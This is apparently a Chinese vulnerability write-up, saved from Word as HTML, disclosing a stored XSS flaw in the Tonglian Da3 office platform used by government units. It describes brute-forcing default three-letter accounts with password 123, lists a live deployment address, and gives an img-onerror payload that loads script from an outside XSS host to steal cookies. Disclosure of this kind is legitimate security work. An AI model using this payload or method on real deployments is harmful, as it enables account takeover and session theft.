同联Da3协同办公平台后台通用储存型xss漏洞
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><meta name="ProgId" content="Word.Document" />
<meta name="Generator" content="Microsoft Word 12" />
<meta name="Originator" content="Microsoft Word 12" />
<link rel="File-List" href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/filelist.xml" />
<link rel="Edit-Time-Data" href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/editdata.mso" />
<!-->
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<!--><!--><xml>
<o:documentproperties>
<o:author>digexploit</o:author>
<o:template>Normal</o:template>
<o:lastauthor>SYSTEM</o:lastauthor>
<o:revision>2</o:revision>
<o:totaltime>1</o:totaltime>
<o:created>2018-10-09T14:22:00Z</o:created>
<o:lastsaved>2018-10-09T14:22:00Z</o:lastsaved>
<o:pages>3</o:pages>
<o:words>153</o:words>
<o:characters>874</o:characters>
<o:company>qywl</o:company>
<o:lines>7</o:lines>
<o:paragraphs>2</o:paragraphs>
<o:characterswithspaces>1025</o:characterswithspaces>
<o:version>12.00</o:version>
</o:documentproperties>
<o:customdocumentproperties>
<o:ksoproductbuildver dt:dt="string">2052-10.1.0.7566</o:ksoproductbuildver>
</o:customdocumentproperties>
</xml><!-->
<link rel="dataStoreItem" href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/item0001.xml" target="282163076b0abcc07e37d46af6b71a3f.files/props0002.xml" />
<link rel="themeData" href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/themedata.thmx" />
<link rel="colorSchemeMapping" href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/colorschememapping.xml" />
<!--><xml>
<w:worddocument>
<w:trackmoves>false</w:trackmoves>
<w:trackformatting />
<w:punctuationkerning />
<w:drawinggridverticalspacing>7.8 磅</w:drawinggridverticalspacing>
<w:displayhorizontaldrawinggridevery>0</w:displayhorizontaldrawinggridevery>
<w:displayverticaldrawinggridevery>2</w:displayverticaldrawinggridevery>
<w:validateagainstschemas />
<w:saveifxmlinvalid>false</w:saveifxmlinvalid>
<w:ignoremixedcontent>false</w:ignoremixedcontent>
<w:alwaysshowplaceholdertext>false</w:alwaysshowplaceholdertext>
<w:donotpromoteqf />
<w:lidthemeother>EN-US</w:lidthemeother>
<w:lidthemeasian>ZH-CN</w:lidthemeasian>
<w:lidthemecomplexscript>X-NONE</w:lidthemecomplexscript>
<w:compatibility>
<w:spaceforul />
<w:balancesinglebytedoublebytewidth />
<w:donotleavebackslashalone />
<w:ultrailspace />
<w:donotexpandshiftreturn />
<w:adjustlineheightintable />
<w:breakwrappedtables />
<w:snaptogridincell />
<w:wraptextwithpunct />
<w:useasianbreakrules />
<w:dontgrowautofit />
<w:splitpgbreakandparamark />
<w:dontvertaligncellwithsp />
<w:dontbreakconstrainedforcedtables />
<w:dontvertalignintxbx />
<w:word11kerningpairs />
<w:cachedcolbalance />
<w:usefelayout />
</w:compatibility>
<w:donotoptimizeforbrowser />
<m:mathpr>
<m:mathfont m:val="Cambria Math" />
<m:brkbin m:val="before" />
<m:brkbinsub m:val="--" />
<m:smallfrac />
<m:dispdef />
<m:lmargin m:val="0" />
<m:rmargin m:val="0" />
<m:defjc m:val="centerGroup" />
<m:wrapindent m:val="1440" />
<m:intlim m:val="subSup" />
<m:narylim m:val="undOvr" />
</m:mathpr></w:worddocument>
</xml><!--><!--><xml>
<w:latentstyles deflockedstate="false" defunhidewhenused="false" defsemihidden="false" defqformat="false" latentstylecount="267">
<w:lsdexception locked="false" qformat="true" name="Normal" />
<w:lsdexception locked="false" qformat="true" name="heading 1" />
<w:lsdexception locked="false" semihidden="true" unhidewhenused="true" qformat="true" name="heading 2" />
<w:lsdexception locked="false" semihidden="true" unhidewhenused="true" qformat="true" name="heading 3" />
<w:lsdexception locked="false" semihidden="true" unhidewhenused="true" qformat="true" name="heading 4" />
<w:lsdexception locked="false" semihidden="true" unhidewhenused="true" qformat="true" name="heading 5" />
<w:lsdexception locked="false" semihidden="true" unhidewhenused="true" qformat="true" name="heading 6" />
<w:lsdexception locked="false" semihidden="true" unhidewhenused="true" qformat="true" name="heading 7" />
<w:lsdexception locked="false" semihidden="true" unhidewhenused="true" qformat="true" name="heading 8" />
<w:lsdexception locked="false" semihidden="true" unhidewhenused="true" qformat="true" name="heading 9" />
<w:lsdexception locked="false" semihidden="true" unhidewhenused="true" qformat="true" name="caption" />
<w:lsdexception locked="false" qformat="true" name="Title" />
<w:lsdexception locked="false" priority="1" semihidden="true" qformat="true" name="Default Paragraph Font" />
<w:lsdexception locked="false" qformat="true" name="Subtitle" />
<w:lsdexception locked="false" qformat="true" name="Strong" />
<w:lsdexception locked="false" qformat="true" name="Emphasis" />
<w:lsdexception locked="false" priority="99" semihidden="true" unhidewhenused="true" name="HTML Top of Form" />
<w:lsdexception locked="false" priority="99" semihidden="true" unhidewhenused="true" name="HTML Bottom of Form" />
<w:lsdexception locked="false" semihidden="true" name="Normal Table" />
<w:lsdexception locked="false" priority="99" semihidden="true" unhidewhenused="true" name="No List" />
<w:lsdexception locked="false" priority="99" semihidden="true" unhidewhenused="true" name="Outline List 1" />
<w:lsdexception locked="false" priority="99" semihidden="true" unhidewhenused="true" name="Outline List 2" />
<w:lsdexception locked="false" priority="99" semihidden="true" unhidewhenused="true" name="Outline List 3" />
<w:lsdexception locked="false" priority="99" semihidden="true" unhidewhenused="true" name="Placeholder Text" />
<w:lsdexception locked="false" priority="99" semihidden="true" unhidewhenused="true" name="No Spacing" />
<w:lsdexception locked="false" priority="60" name="Light Shading" />
<w:lsdexception locked="false" priority="61" name="Light List" />
<w:lsdexception locked="false" priority="62" name="Light Grid" />
<w:lsdexception locked="false" priority="63" name="Medium Shading 1" />
<w:lsdexception locked="false" priority="64" name="Medium Shading 2" />
<w:lsdexception locked="false" priority="65" name="Medium List 1" />
<w:lsdexception locked="false" priority="66" name="Medium List 2" />
<w:lsdexception locked="false" priority="67" name="Medium Grid 1" />
<w:lsdexception locked="false" priority="68" name="Medium Grid 2" />
<w:lsdexception locked="false" priority="69" name="Medium Grid 3" />
<w:lsdexception locked="false" priority="70" name="Dark List" />
<w:lsdexception locked="false" priority="71" name="Colorful Shading" />
<w:lsdexception locked="false" priority="72" name="Colorful List" />
<w:lsdexception locked="false" priority="73" name="Colorful Grid" />
<w:lsdexception locked="false" priority="60" name="Light Shading Accent 1" />
<w:lsdexception locked="false" priority="61" name="Light List Accent 1" />
<w:lsdexception locked="false" priority="62" name="Light Grid Accent 1" />
<w:lsdexception locked="false" priority="63" name="Medium Shading 1 Accent 1" />
<w:lsdexception locked="false" priority="64" name="Medium Shading 2 Accent 1" />
<w:lsdexception locked="false" priority="65" name="Medium List 1 Accent 1" />
<w:lsdexception locked="false" priority="99" semihidden="true" unhidewhenused="true" name="Revision" />
<w:lsdexception locked="false" priority="99" semihidden="true" unhidewhenused="true" name="List Paragraph" />
<w:lsdexception locked="false" priority="99" semihidden="true" unhidewhenused="true" name="Quote" />
<w:lsdexception locked="false" priority="99" semihidden="true" unhidewhenused="true" name="Intense Quote" />
<w:lsdexception locked="false" priority="66" name="Medium List 2 Accent 1" />
<w:lsdexception locked="false" priority="67" name="Medium Grid 1 Accent 1" />
<w:lsdexception locked="false" priority="68" name="Medium Grid 2 Accent 1" />
<w:lsdexception locked="false" priority="69" name="Medium Grid 3 Accent 1" />
<w:lsdexception locked="false" priority="70" name="Dark List Accent 1" />
<w:lsdexception locked="false" priority="71" name="Colorful Shading Accent 1" />
<w:lsdexception locked="false" priority="72" name="Colorful List Accent 1" />
<w:lsdexception locked="false" priority="73" name="Colorful Grid Accent 1" />
<w:lsdexception locked="false" priority="60" name="Light Shading Accent 2" />
<w:lsdexception locked="false" priority="61" name="Light List Accent 2" />
<w:lsdexception locked="false" priority="62" name="Light Grid Accent 2" />
<w:lsdexception locked="false" priority="63" name="Medium Shading 1 Accent 2" />
<w:lsdexception locked="false" priority="64" name="Medium Shading 2 Accent 2" />
<w:lsdexception locked="false" priority="65" name="Medium List 1 Accent 2" />
<w:lsdexception locked="false" priority="66" name="Medium List 2 Accent 2" />
<w:lsdexception locked="false" priority="67" name="Medium Grid 1 Accent 2" />
<w:lsdexception locked="false" priority="68" name="Medium Grid 2 Accent 2" />
<w:lsdexception locked="false" priority="69" name="Medium Grid 3 Accent 2" />
<w:lsdexception locked="false" priority="70" name="Dark List Accent 2" />
<w:lsdexception locked="false" priority="71" name="Colorful Shading Accent 2" />
<w:lsdexception locked="false" priority="72" name="Colorful List Accent 2" />
<w:lsdexception locked="false" priority="73" name="Colorful Grid Accent 2" />
<w:lsdexception locked="false" priority="60" name="Light Shading Accent 3" />
<w:lsdexception locked="false" priority="61" name="Light List Accent 3" />
<w:lsdexception locked="false" priority="62" name="Light Grid Accent 3" />
<w:lsdexception locked="false" priority="63" name="Medium Shading 1 Accent 3" />
<w:lsdexception locked="false" priority="64" name="Medium Shading 2 Accent 3" />
<w:lsdexception locked="false" priority="65" name="Medium List 1 Accent 3" />
<w:lsdexception locked="false" priority="66" name="Medium List 2 Accent 3" />
<w:lsdexception locked="false" priority="67" name="Medium Grid 1 Accent 3" />
<w:lsdexception locked="false" priority="68" name="Medium Grid 2 Accent 3" />
<w:lsdexception locked="false" priority="69" name="Medium Grid 3 Accent 3" />
<w:lsdexception locked="false" priority="70" name="Dark List Accent 3" />
<w:lsdexception locked="false" priority="71" name="Colorful Shading Accent 3" />
<w:lsdexception locked="false" priority="72" name="Colorful List Accent 3" />
<w:lsdexception locked="false" priority="73" name="Colorful Grid Accent 3" />
<w:lsdexception locked="false" priority="60" name="Light Shading Accent 4" />
<w:lsdexception locked="false" priority="61" name="Light List Accent 4" />
<w:lsdexception locked="false" priority="62" name="Light Grid Accent 4" />
<w:lsdexception locked="false" priority="63" name="Medium Shading 1 Accent 4" />
<w:lsdexception locked="false" priority="64" name="Medium Shading 2 Accent 4" />
<w:lsdexception locked="false" priority="65" name="Medium List 1 Accent 4" />
<w:lsdexception locked="false" priority="66" name="Medium List 2 Accent 4" />
<w:lsdexception locked="false" priority="67" name="Medium Grid 1 Accent 4" />
<w:lsdexception locked="false" priority="68" name="Medium Grid 2 Accent 4" />
<w:lsdexception locked="false" priority="69" name="Medium Grid 3 Accent 4" />
<w:lsdexception locked="false" priority="70" name="Dark List Accent 4" />
<w:lsdexception locked="false" priority="71" name="Colorful Shading Accent 4" />
<w:lsdexception locked="false" priority="72" name="Colorful List Accent 4" />
<w:lsdexception locked="false" priority="73" name="Colorful Grid Accent 4" />
<w:lsdexception locked="false" priority="60" name="Light Shading Accent 5" />
<w:lsdexception locked="false" priority="61" name="Light List Accent 5" />
<w:lsdexception locked="false" priority="62" name="Light Grid Accent 5" />
<w:lsdexception locked="false" priority="63" name="Medium Shading 1 Accent 5" />
<w:lsdexception locked="false" priority="64" name="Medium Shading 2 Accent 5" />
<w:lsdexception locked="false" priority="65" name="Medium List 1 Accent 5" />
<w:lsdexception locked="false" priority="66" name="Medium List 2 Accent 5" />
<w:lsdexception locked="false" priority="67" name="Medium Grid 1 Accent 5" />
<w:lsdexception locked="false" priority="68" name="Medium Grid 2 Accent 5" />
<w:lsdexception locked="false" priority="69" name="Medium Grid 3 Accent 5" />
<w:lsdexception locked="false" priority="70" name="Dark List Accent 5" />
<w:lsdexception locked="false" priority="71" name="Colorful Shading Accent 5" />
<w:lsdexception locked="false" priority="72" name="Colorful List Accent 5" />
<w:lsdexception locked="false" priority="73" name="Colorful Grid Accent 5" />
<w:lsdexception locked="false" priority="60" name="Light Shading Accent 6" />
<w:lsdexception locked="false" priority="61" name="Light List Accent 6" />
<w:lsdexception locked="false" priority="62" name="Light Grid Accent 6" />
<w:lsdexception locked="false" priority="63" name="Medium Shading 1 Accent 6" />
<w:lsdexception locked="false" priority="64" name="Medium Shading 2 Accent 6" />
<w:lsdexception locked="false" priority="65" name="Medium List 1 Accent 6" />
<w:lsdexception locked="false" priority="66" name="Medium List 2 Accent 6" />
<w:lsdexception locked="false" priority="67" name="Medium Grid 1 Accent 6" />
<w:lsdexception locked="false" priority="68" name="Medium Grid 2 Accent 6" />
<w:lsdexception locked="false" priority="69" name="Medium Grid 3 Accent 6" />
<w:lsdexception locked="false" priority="70" name="Dark List Accent 6" />
<w:lsdexception locked="false" priority="71" name="Colorful Shading Accent 6" />
<w:lsdexception locked="false" priority="72" name="Colorful List Accent 6" />
<w:lsdexception locked="false" priority="73" name="Colorful Grid Accent 6" />
<w:lsdexception locked="false" priority="19" qformat="true" name="Subtle Emphasis" />
<w:lsdexception locked="false" priority="21" qformat="true" name="Intense Emphasis" />
<w:lsdexception locked="false" priority="31" qformat="true" name="Subtle Reference" />
<w:lsdexception locked="false" priority="32" qformat="true" name="Intense Reference" />
<w:lsdexception locked="false" priority="33" qformat="true" name="Book Title" />
<w:lsdexception locked="false" priority="37" semihidden="true" unhidewhenused="true" name="Bibliography" />
<w:lsdexception locked="false" priority="39" semihidden="true" unhidewhenused="true" qformat="true" name="TOC Heading" />
</w:latentstyles>
</xml><!-->
<style>
<!-- /* Font Definitions */ @font-face {font-family:宋体; panose-1:2 1 6 0 3 1 1 1 1 1; mso-font-alt:SimSun; mso-font-charset:134; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 135135232 16 0 262145 0;} @font-face {font-family:"Cambria Math"; panose-1:2 4 5 3 5 4 6 3 2 4; mso-font-charset:1; mso-generic-font-family:roman; mso-font-format:other; mso-font-pitch:variable; mso-font-signature:0 0 0 0 0 0;} @font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1610611985 1073750139 0 0 159 0;} @font-face {font-family:"\@宋体"; panose-1:2 1 6 0 3 1 1 1 1 1; mso-font-charset:134; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 135135232 16 0 262145 0;} /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-unhide:no; mso-style-qformat:yes; mso-style-parent:""; margin:0cm; margin-bottom:.0001pt; text-align:justify; text-justify:inter-ideograph; mso-pagination:none; font-size:10.5pt; mso-bidi-font-size:12.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-fareast-font-family:宋体; mso-fareast-theme-font:minor-fareast; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi; mso-font-kerning:1.0pt;} p.MsoHeader, li.MsoHeader, div.MsoHeader {mso-style-unhide:no; mso-style-link:"页眉 Char"; margin:0cm; margin-bottom:.0001pt; text-align:center; mso-pagination:none; tab-stops:center 207.65pt right 415.3pt; layout-grid-mode:char; border:none; mso-border-bottom-alt:solid windowtext .75pt; padding:0cm; mso-padding-alt:0cm 0cm 1.0pt 0cm; font-size:9.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-fareast-font-family:宋体; mso-fareast-theme-font:minor-fareast; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi; mso-font-kerning:1.0pt;} p.MsoFooter, li.MsoFooter, div.MsoFooter {mso-style-unhide:no; mso-style-link:"页脚 Char"; margin:0cm; margin-bottom:.0001pt; mso-pagination:none; tab-stops:center 207.65pt right 415.3pt; layout-grid-mode:char; font-size:9.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-fareast-font-family:宋体; mso-fareast-theme-font:minor-fareast; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi; mso-font-kerning:1.0pt;} a:link, span.MsoHyperlink {mso-style-unhide:no; color:blue; text-decoration:underline; text-underline:single;} a:visited, span.MsoHyperlinkFollowed {mso-style-unhide:no; color:#954F72; mso-themecolor:followedhyperlink; text-decoration:underline; text-underline:single;} p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-unhide:no; mso-style-link:"批注框文本 Char"; margin:0cm; margin-bottom:.0001pt; text-align:justify; text-justify:inter-ideograph; mso-pagination:none; font-size:9.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-fareast-font-family:宋体; mso-fareast-theme-font:minor-fareast; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi; mso-font-kerning:1.0pt;} span.Char {mso-style-name:"批注框文本 Char"; mso-style-unhide:no; mso-style-locked:yes; mso-style-link:批注框文本; mso-ansi-font-size:9.0pt; mso-bidi-font-size:9.0pt; mso-font-kerning:1.0pt;} span.Char0 {mso-style-name:"页眉 Char"; mso-style-unhide:no; mso-style-locked:yes; mso-style-link:页眉; mso-ansi-font-size:9.0pt; mso-bidi-font-size:9.0pt; mso-font-kerning:1.0pt;} span.Char1 {mso-style-name:"页脚 Char"; mso-style-unhide:no; mso-style-locked:yes; mso-style-link:页脚; mso-ansi-font-size:9.0pt; mso-bidi-font-size:9.0pt; mso-font-kerning:1.0pt;} .MsoChpDefault {mso-style-type:export-only; mso-default-props:yes; font-size:10.0pt; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi; mso-font-kerning:0pt;} /* Page Definitions */ @page {mso-page-border-surround-header:no; mso-page-border-surround-footer:no; mso-footnote-separator:url("282163076b0abcc07e37d46af6b71a3f.files/header.html") fs; mso-footnote-continuation-separator:url("282163076b0abcc07e37d46af6b71a3f.files/header.html") fcs; mso-endnote-separator:url("282163076b0abcc07e37d46af6b71a3f.files/header.html") es; mso-endnote-continuation-separator:url("282163076b0abcc07e37d46af6b71a3f.files/header.html") ecs;} @page Section1 {size:595.3pt 841.9pt; margin:72.0pt 90.0pt 72.0pt 90.0pt; mso-header-margin:42.55pt; mso-footer-margin:49.6pt; mso-paper-source:0; layout-grid:15.6pt;} div.Section1 {page:Section1;} -->
</style>
<!-->
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:普通表格;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style>
<!--><!--><xml>
<o:shapedefaults v:ext="edit" spidmax="3074" />
</xml><!--><!--><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="2" />
</o:shapelayout></xml><!-->
<div class="Section1" style="layout-grid:15.6pt;">
<p class="MsoNormal" align="center" style="text-align:center;">
同联Da3协同办公平台后台通用储存型xss漏洞
</p>
<p class="MsoNormal">
平台简介:
</p>
<p class="MsoNormal">
<o:p> </o:p>
</p>
<p class="MsoNormal" align="left" style="text-align:left;mso-pagination:widow-orphan;">
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 <br />
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。 <br />
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
</p>
<p class="MsoNormal">
<o:p> </o:p>
</p>
<p class="MsoNormal">
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
</p>
<p class="MsoNormal">
<o:p> </o:p>
</p>
<p class="MsoNormal">
<a href="http://59.48.248.2:7197/cap-aco/#">http://1.1.1.1:7197/cap-aco/#</a>(案例2-)
</p>
<p class="MsoNormal">
<a href="http://www.itonglian.com">http://www.XXOO.com</a> (案例1-官网网站)
</p>
<p class="MsoNormal">
漏洞详情:
</p>
<p class="MsoNormal">
案例一、
</p>
<p class="MsoNormal">
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
</p>
<p class="MsoNormal">
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
</p>
<p class="MsoNormal">
<o:p> </o:p>
</p>
<p class="MsoNormal" align="left" style="text-align:left;mso-pagination:widow-orphan;">
<!--><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
<v:stroke joinstyle="miter" />
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0" />
<v:f eqn="sum @0 1 0" />
<v:f eqn="sum 0 0 @1" />
<v:f eqn="prod @2 1 2" />
<v:f eqn="prod @3 21600 pixelWidth" />
<v:f eqn="prod @3 21600 pixelHeight" />
<v:f eqn="sum @0 0 1" />
<v:f eqn="prod @6 1 2" />
<v:f eqn="prod @7 21600 pixelWidth" />
<v:f eqn="sum @8 21600 0" />
<v:f eqn="prod @7 21600 pixelHeight" />
<v:f eqn="sum @10 21600 0" />
</v:formulas>
<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect" />
<o:lock v:ext="edit" aspectratio="t" />
</v:shapetype><v:shape id="_x0000_i1032" type="#_x0000_t75" alt="IMG_256" style="width:469.5pt;height:267pt;visibility:visible;mso-wrap-style:square;">
<v:imagedata src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image001.png" o:title="IMG_256" />
</v:shape><!--><!----><a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image002.jpg" target="_blank" class="highslide"><img border="0" width="626" height="356" src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image002.jpg" alt="IMG_256" v:shapes="_x0000_i1032" /><!----></a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image002.jpg" target="_blank" class="highslide">status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:</a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image002.jpg" target="_blank" class="highslide"><o:p> </o:p></a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image002.jpg" target="_blank" class="highslide"><!--><v:shape id="_x0000_i1031" type="#_x0000_t75" style="width:414.75pt;height:296.25pt;visibility:visible;mso-wrap-style:square;">
<v:imagedata src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image003.png" o:title="" />
</v:shape><!--><!----></a><a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image004.jpg" target="_blank" class="highslide"><img border="0" width="553" height="395" src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image004.jpg" v:shapes="_x0000_i1031" /><!----></a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image004.jpg" target="_blank" class="highslide">然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下</a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image004.jpg" target="_blank" class="highslide"><o:p> </o:p></a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image004.jpg" target="_blank" class="highslide"><img src=x
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:</a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image004.jpg" target="_blank" class="highslide"><!--><v:shape id="_x0000_i1030" type="#_x0000_t75" style="width:414.75pt;height:183pt;visibility:visible;mso-wrap-style:square;">
<v:imagedata src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image005.png" o:title="" />
</v:shape><!--><!----></a><a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image006.jpg" target="_blank" class="highslide"><img border="0" width="553" height="244" src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image006.jpg" v:shapes="_x0000_i1030" /><!----></a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image006.jpg" target="_blank" class="highslide">然后发送,接收cookie如图:</a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image006.jpg" target="_blank" class="highslide"><o:p> </o:p></a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image006.jpg" target="_blank" class="highslide"><o:p> </o:p></a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image006.jpg" target="_blank" class="highslide"><o:p> </o:p></a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image006.jpg" target="_blank" class="highslide"><o:p> </o:p></a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image006.jpg" target="_blank" class="highslide"><!--><v:shape id="图片_x0020_3" o:spid="_x0000_i1029" type="#_x0000_t75" style="width:415.5pt;height:278.25pt;visibility:visible;mso-wrap-style:square;">
<v:imagedata src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image007.png" o:title="" />
</v:shape><!--><!----></a><a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image008.jpg" target="_blank" class="highslide"><img border="0" width="554" height="371" src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image008.jpg" v:shapes="图片_x0020_3" /><!----></a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image008.jpg" target="_blank" class="highslide"><!--><v:shape id="图片_x0020_1" o:spid="_x0000_i1028" type="#_x0000_t75" style="width:315pt;height:193.5pt;visibility:visible;mso-wrap-style:square;">
<v:imagedata src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image009.png" o:title="" />
</v:shape><!--><!----></a><a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image010.jpg" target="_blank" class="highslide"><img border="0" width="420" height="258" src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image010.jpg" v:shapes="图片_x0020_1" /><!----></a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image010.jpg" target="_blank" class="highslide"><o:p> </o:p></a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image010.jpg" target="_blank" class="highslide">案例2、</a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image010.jpg" target="_blank" class="highslide">前面步骤都一样,下面看效果图:</a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image010.jpg" target="_blank" class="highslide"><!--><v:shape id="图片_x0020_5" o:spid="_x0000_i1027" type="#_x0000_t75" style="width:377.25pt;height:210.75pt;visibility:visible;mso-wrap-style:square;">
<v:imagedata src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image011.png" o:title="" />
</v:shape><!--><!----></a><a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image012.jpg" target="_blank" class="highslide"><img border="0" width="503" height="281" src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image012.jpg" v:shapes="图片_x0020_5" /><!----></a>
</p>
<p class="MsoNormal">
<a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image012.jpg" target="_blank" class="highslide"><!--><v:shape id="图片_x0020_6" o:spid="_x0000_i1026" type="#_x0000_t75" style="width:399pt;height:223.5pt;visibility:visible;mso-wrap-style:square;">
<v:imagedata src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image013.png" o:title="" />
</v:shape><!--><!----></a><a href="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image014.jpg" target="_blank" class="highslide"><img border="0" width="532" height="298" src="https://www.2k8.org/admin/282163076b0abcc07e37d46af6b71a3f.files/image014.jpg" v:shapes="图片_x0020_6" /><!----></a>
</p>
<p class="MsoNormal">
